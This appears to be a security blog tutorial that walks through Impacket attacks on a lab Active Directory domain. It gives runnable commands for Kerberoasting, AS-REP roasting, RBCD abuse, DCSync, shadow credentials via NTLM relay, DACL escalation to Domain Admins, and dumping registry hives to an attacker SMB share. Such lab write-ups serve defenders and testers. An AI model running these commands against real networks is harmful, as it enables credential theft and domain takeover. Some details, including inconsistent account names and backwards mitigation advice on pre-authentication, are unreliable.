Impacket is a powerful Python toolkit for working with network protocols, particularly useful in Active Directory (AD) penetration testing. It provides various scripts to exploit common AD vulnerabilities, perform lateral movement, and extract sensitive data. This article demonstrates practical AD pentesting techniques using Impacket, covering enumeration, exploitation, and post exploitation.

Table of Contents

Introduction to Impacket

Enumeration

• Enumerate SIDs
• Enumerating AD Users
• Enumerating AD Computers

Resource-Based Constrained Delegation (RBCD) Attack

Kerberos-Based Attacks

• AS-REP Roasting
• Kerberoasting

Credential Dumping

• DCSync Attack
• Local Administrator Password Solution (LAPS) Extraction
• GMSA Attack

Abusing AD-DACL

• ForceChangePassword
• WriteDacl & WriteOwner

Overpass-the-Hash

Shadow Credentials Attack

Extracting Credentials from Registry Hive

Mitigation

Conclusion

Introduction to Impacket

Impacket is a versatile Python-based toolkit widely used in both penetration testing and malicious hacking efforts. For penetration testers, Impacket facilitates the simulation of realistic attack scenarios, allowing for identification and remediation of vulnerabilities within an organization’s network. Adversaries often use Impacket to exploit Windows services and protocols, move laterally within networks, escalate privileges, and access sensitive data. Impacket is a favored tool for threat actors including ransomware groups due to its comprehensive suite of capabilities for reconnaissance, credential dumping, and unauthorized command execution.

Enumeration

Enumeration is the first step in AD pentesting to gather information about users, computers, and other AD objects.

Enumerate SIDs

Impacket’s lookupsid allows you to enumerate user SIDs (Security Identifiers) and group SIDs on a Windows system. Each user account and group account on a Windows system has a unique SID. By obtaining the SIDs, you can gather information about existing user accounts, which can be valuable in understanding the network’s structure and potential attack vectors. 

impacket-lookupsid ignite.local/krishna:Password@1@192.168.1.14

Enumerate AD Users

Impacket’s GetADUsers tool is used to query Active Directory users. It works by using credentials and performing an LDAP query to get information about users within the AD environment. It can help extract things like username, descriptions (maybe some interesting info), last login time, password last set and more.

impacket-GetADUsers ignite.local/Administrator:Ignite@987 -dc-ip 192.168.1.14 -all

Retrieves all AD users along with their attributes (e.g., last logon, description).

Enumerate AD Computers

Lists all computer objects in the domain.

impacket-GetADComputers ignite.local/aarti:Password@1 -dc-ip 192.168.1.14

Resource-Based Constrained Delegation (RBCD) Attack

Resource-Based Constrained Delegation (RBCD) is a security feature in Active Directory (AD) that allows a computer object to specify which users or machines can impersonate accounts to access its resources. This delegation method provides more granular control compared to older unconstrained and constrained delegation methods. However, attackers can exploit misconfigured RBCD to gain unauthorized access and escalate privileges within a domain.

The following steps outline the process:

• Create a fake computer account
• Edit the target’s “rbcd” attribute by delegating control on a domain controller (DC) to this fake machine
• Fake computer account acts on behalf of Domain Controller (DC$) account
• Obtain a ticket (delegation operation)
• Once the ticket is obtained, it can be used with pass-the-ticket.

Abuse MachineAccountQuota to create a computer account

Since Active Directory allows users to create machine accounts (if MachineAccountQuota > 0), we leverage this to create a new fake machine using the Geet account.

To do this, we’ll use addcomputer script, this script has a SAMR option to add a new computer, which functions over SMB.

impacket-addcomputer ignite.local/geet:Password@1 -computer-name fakepc -computer-pass Password@123 -dc-ip 192.168.1.14

Rewrite DC’s AllowedToActOnBehalfOfOtherIdentity properties

We will configure msDS-AllowedToActOnBehalfOfOtherIdentity on the domain controller (DC$), allowing our fake machine account to impersonate users.

We can use Impacket’s rbcd script to read, write, or clear delegation rights. Make sure you use credentials of a domain user who has the appropriate permissions.

impacket-rbcd ignite.local/geet:Password@1 -action write -delegate-to 'DC$' -delegate-from 'farkepc$' -dc-ip 192.168.1.14

Generate a Service Ticket for CIFS

The fake machine account requests a Kerberos Service Ticket for a privileged user (e.g., Administrator) using Service for User to Self (S4U2Self).

Then, it escalates the ticket using Service for User to Proxy (S4U2Proxy) to obtain access to DC$.

Once you modify the delegation attribute, you can use the Impacket getST script to obtain a Service Ticket (ST) for impersonation. For instance, you may impersonate the Administrator or any other user within the domain.

impacket-getST ignite.local/'farzipc$':Password@123 -spn cifs/DC.ignite.local -impersonate administrator -dc-ip 192.168.1.14

Obtain Privileged Access

After you obtain the Kerberos ticket, you can use it with pass-the-ticket techniques.

In order to use the ticket, first export an environment variable that points to the created ticket.

export KRB5CCNAME=administrator@cifs_DC.ignite.local@IGNITE.LOCAL.ccache

Use impacket’s psexec for the remote code execution using pass-the-ticket method.

impacket-psexec ignite.local/administrator@DC.ignite.local -k -no-pass -dc-ip 192.168.1.14

Kerberos-Based Attacks

Kerberos is a common target for AD attacks due to misconfigurations and weak credentials.

AS-REP Roasting

AS-REP Roasting is an attack targeting the Kerberos authentication protocol. It exploits accounts where Kerberos pre authentication is disabled, allowing attackers to crack passwords offline.

How the Attack Works:

1. Request a Ticket: The attacker sends a request to the Key Distribution Center (KDC) for an account with pre-authentication disabled.
2. Receive Encrypted Data: The KDC sends back an AS-REP response, encrypted using the account’s password hash.
3. Crack the Password: The attacker uses tools to brute force the password offline. If the password is weak, they gain access.

The GetNPUsers script within Impacket can be used to perform AS-REP Roasting attacks and retrieve password hashes.

impacket-GetNPUsers -dc-ip 192.168.1.14 ignite.local/ -usersfile users.txt -format john -outputfile hashes

Further, with the help of John the Ripper dictionary such as Rockyou can help the attacker to extract the password from the hash.

john -w=/usr/share/wordlists/rockyou.txt hashes

Kerberoasting

Kerberoasting is a technique that allows an attacker to steal the KRB_TGS ticket, that is encrypted with RC4, to brute force application services hash to extract its password.

Impacket’s GetUserSPNs script will try to find and fetch Service Principal Names that are associated with normal user accounts. Output is compatible with John the Ripper and HashCat.

impacket-GetUserSPNs -request -dc-ip 192.168.1.14 ignite.local/shivam:Password@1

Further, with the help of John the Ripper dictionary such as Rockyou can help the attacker to extract the password from the hash.

john -w=/usr/share/wordlists/rockyou.txt hashes

Credential Dumping

DCSync Attack

A DCSync attack uses commands in Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to pretend to be a domain controller (DC) in order to get user credentials from another DC.

Impacket’s secretsdump.py will perform various techniques to dump secrets from the remote machine without executing any agent. Techniques include reading SAM and LSA secrets from registries, dumping NTLM hashes, plaintext credentials, and kerberos keys, and dumping NTDS.dit.

impacket-secretsdump ignite.local/komal:Password@1@192.168.1.14

Local Administrator Password Solution (LAPS) Extraction

LAPS (Local Administrator Password Solution) is a Microsoft solution that randomizes and stores local administrator passwords.

If LAPS is implemented, we can retrieve local admin passwords.

impacket-GetLAPSPassword ignite.local/aarti:Password@1 -dc-ip 192.168.1.14

GMSA Attack

Service accounts’ passwords are commonly not regularly rotated, putting them at risk, especially because they can be targeted through Kerberoasting attacks. 

ReadGMSAPassword Attack is a technique where attackers abuse misconfigured Group Managed Service Accounts (gMSA) to retrieve their passwords.

In Active Directory, administrators should only grant ReadGMSAPassword to specific systems. However, if they misconfigure these permissions, an attacker with access to a machine that can query the gMSA password can extract it and use it to authenticate as that service account. 

impacket-secretsdump ignite.local/komal:Password@1@192.168.1.14 | grep GMSA

Abusing AD-DACL

ForceChangePassword

ForceChangePassword permission grants the right to change the password of a user account without knowing their current password. Consequently, attackers can use this access to perform unauthorized actions.

Using impacket’s changepasswd attackers can use smbpasswd from Impacket to change a user’s password over the SMB protocol without knowing the current password.

impacket-changepasswd ignite.local/panther@192.168.1.14 -newpass Password@1234 -altuser ignite.local/suri -altpass Password@1 -reset

Impacket’s changepassword can also be used to change current user password, if current password is known.

impacket-changepasswd ignite.local/komal@192.168.1.14 -newpass ‘Password@987’ -p rpc-samr

WriteDacl & WriteOwner

Granting Ownership

The WriteOwner permission allows a user to change the ownership of an object to a different user or principal, including one controlled by an attacker. Consequently, an attacker can exploit this permission to take ownership of a target object.

The tool owneredit allows changing ownership of a directory object.

impacket-owneredit -action write -new-owner 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.14

Granting Control

The WriteDacl permission in Active Directory allows users to modify the Discretionary Access Control List (DACL) of an AD object, giving them the ability to control object level permissions.

This can be done with Impacket-dacledit.

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'aaru' -target-dn 'CN=Domain Admins,CN=Users,DC=ignite,DC=local' 'ignite.local'/'aaru':'Password@1' -dc-ip 192.168.1.14

The tester can abuse these permission by adding Aaru User into the Domain Admin group and listing the domain admin members to ensure that Aaru Users become Domain Admin.

bloodyAD --host "192.168.1.14" -d "ignite.local" -u "aaru" -p "Password@1" add groupMember "Domain Admins" "aaru"

Impacket’s PsExec is another widely used post exploitation tool for remote command execution. After adding Aaru user in domain admins group, attacker/tester can use psexec for remote contro; execution.

impacket-psexec aaru:Password@1@ignite.local -dc-ip 192.168.1.14

Overpass-the-Hash

Over Pass the hash is a combination of passing the hash and passing the ticket, so it’s called Over Pass the hash. Allows the creation of Kerberos tickets from NTLM hash or AES keys that allow access to the resource service that required Kerberos authentication.

use impacket python script gettgt.py which will use a password, hash or aesKey, it will request a TGT and save it as ccache.

impacket-getTGT -dc-ip 192.168.1.14 -hashes :32196b56ffe6f45e294117b91a83bf38 ignite.local/Administrator

With the help of above command, you will be able to request Kerberos authorized ticket in the form of ccache whereas with the help of the following command you will be able to inject the ticket to access the resource.

export KRB5CCNAME=Administrator.ccache
impacket-psexec ignite.local/administrator@DC.ignite.local -k -no-pass -dc-ip 192.168.1.14

Overpass-the-Hash (Convert NTLM to Kerberos)

Converts an NTLM hash into a Kerberos TGT for stealthier access.

impacket-describeTicket Administrator.ccache

This script will convert kirbi files (commonly used by mimikatz) into ccache files used by impacket, and vice versa

impacket-ticketConverter Administrator.ccache admin.kirbi

Shadow Credentials Attack

The Shadow Credentials attack takes advantage of improper permissions on the msDS-KeyCredentialLink attribute, allowing attackers to inject their own public key into the attribute of a target user or computer account. Once this is done, they can impersonate the target account using PKINIT.

Here is how the attack works step by step:

• Identify Target Permissions
• Inject the Attacker’s Public Key
• Generate a Certificate
• Authenticate as the Target Account
• Impersonate Users or Escalate Privileges

You can set shadow credentials on the computer object using impacket’s ntlmrelayx.

We will launch ntlmrelayx with the “–shadow-credentials” option and the “–shadow-target” parameter set to the name of the computer account that we are expecting to relay (in this case, DC$)

impacket-ntlmrelayx -t ldap://192.168.1.14 --shadow-credentials --shadow-target 'dc$'

Trigger a callback via browser, using krishna user’s credentials.

After a brief wait, we receive an HTTP connection from the DC$ computer account along with its NTLM credentials. These credentials are then relayed to the LDAP service on the domain controller and the msDS-KeyCredentialLink attribute of the relayed computer account is updated.

Use Certificate to Dump NTDS

nxc smb 192.168.1.14 --pfx-cert FZn7B2sQ.pfx --pfx-pass 05FY014jsNhqqL1IbDhr -u DC$ --ntds --user administrator

Extracting Credentials from Registry Hive

Impacket-reg is a tool from the Impacket suite used to remotely interact with the Windows Registry of a target machine over SMB using credentials — typically useful during post-exploitation, red teaming, or lateral movement.

Key Privileges That Help:

SeBackupPrivilege: Allows reading SYSTEM/SAM/NTDS files even if you don’t have full admin
Administrator: (Local or Domain) Can dump registry, access files, and use tools like secretsdump, reg.py
RemoteRegistry Service: Running Required for reg.py to connect and dump
SeDebugPrivilege: (Advanced) Helps inject into LSASS (used by Mimikatz), useful in custom attacks

First, set up an SMB share on your attacker machine using the impacket-smbserver. This share will store the dumped registry files.

impacket-smbserver share $(pwd) -smb2support

Next, dump the SAM and SYSTEM hives from the target machine, using the impacket-reg tool.

impacket-reg ignite.local/aarav:Password@1@192.168.1.48 backup -o '\\192.168.1.16\share'

Finally, on the Kali Linux shell, use Impacket’s secretsdump to extract password hashes from the SAM and SYSTEM hive

impacket-secretsdump -sam SAM.save -system SYSTEM.save -security SECURITY.save local

As illustrated below, we successfully extracted the Administrator account hashes. Use Evil-WinRM to log in as Administrator using the extracted hash, thereby achieving privilege escalation on the Windows Domain Controller.

evil-winrm -i 192.168.1.48 -u administrator -H 32196b56ffe6f45e294117b91a83bf38

Mitigations

• Disable insecure Kerberos settings (e.g., pre-authentication).
• Restrict delegation rights (Constrained Delegation > RBCD).
• Monitor for anomalous ticket requests (e.g., GetUserSPNs, DCSync).
• Implement LAPS securely and restrict access.
• Enable SMB signing to prevent relay attacks.

Conclusion

Impacket is an indispensable tool for AD penetration testing, enabling attackers (and defenders) to exploit common misconfigurations. This guide covered:

• Enumeration (users, computers)
• Kerberos attacks (AS-REP, Kerberoasting)
• Delegation abuse (RBCD)
• Credential dumping (DCSync, LAPS, PtH)
• Shadow credentials & persistence

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is a completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here